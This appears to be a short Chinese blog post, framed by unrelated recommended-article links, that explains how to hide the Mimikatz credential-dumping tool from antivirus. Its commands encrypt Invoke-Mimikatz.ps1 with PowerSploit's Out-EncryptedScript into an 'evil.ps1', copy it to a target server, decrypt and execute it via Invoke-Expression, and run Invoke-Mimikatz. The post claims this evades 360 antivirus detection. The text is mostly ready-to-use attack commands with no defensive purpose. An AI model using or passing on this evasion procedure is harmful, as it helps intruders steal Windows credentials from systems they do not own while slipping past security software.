minikatz免杀之Out-EncryptedScript加密

相关文章推荐

刀枪不入的感冒药 · Azure AI Speech | ...· 4 月前 ·

长情的电池 · 热火正式给希罗3.8亿超级顶薪，巴特勒被气到 ...· 5 月前 ·

爱旅游的煎饼果子 · 港股上市公司再融资，是利好还是利空？|港股上 ...· 1 年前 ·

踢足球的泡面 · 怎么用weka分训练集和测试集 - CSDN文库· 1 年前 ·

大气的电池 · 一部大尺度美国电影，看完彻底怀疑人生，人性的 ...· 1 年前 ·

把Out-EncryptedScript.ps1与Invoke-Mimikatz.ps1放在一起

Out-EncryptedScript.ps1在ScriptModification目录下

Invoke-Mimikatz.ps1在Exfiltration目录下

导入Out-EncryptedScript.ps1
Import-Module .\Out-EncryptedScript.ps1

Out-EncryptedScript .\Invoke-Mimikatz.ps1 -Password 123 -Salt 123456

会在当前目录下生成evil.ps1文件，Password为密码，Salt为密钥

把生成的evil.ps1放到目标服务器上，执行脚本：

[String] $cmd = Get-Content .\evil.ps1

Invoke-Expression $cmd

$decrypted = de password salt

Invoke-Expression $decrypted

Invoke-Mimikatz

过360主动被动

推荐文章

刀枪不入的感冒药 · Azure AI Speech | Microsoft Azure

4 月前

长情的电池 · 热火正式给希罗3.8亿超级顶薪，巴特勒被气到怒摔手机狂骂莱利_交易_合同_1

5 月前

爱旅游的煎饼果子 · 港股上市公司再融资，是利好还是利空？|港股上市_新浪财经_新浪网

1 年前

踢足球的泡面 · 怎么用weka分训练集和测试集 - CSDN文库

1 年前

大气的电池 · 一部大尺度美国电影，看完彻底怀疑人生，人性的丑陋展现淋漓尽致_哔哩哔哩_bilibili

1 年前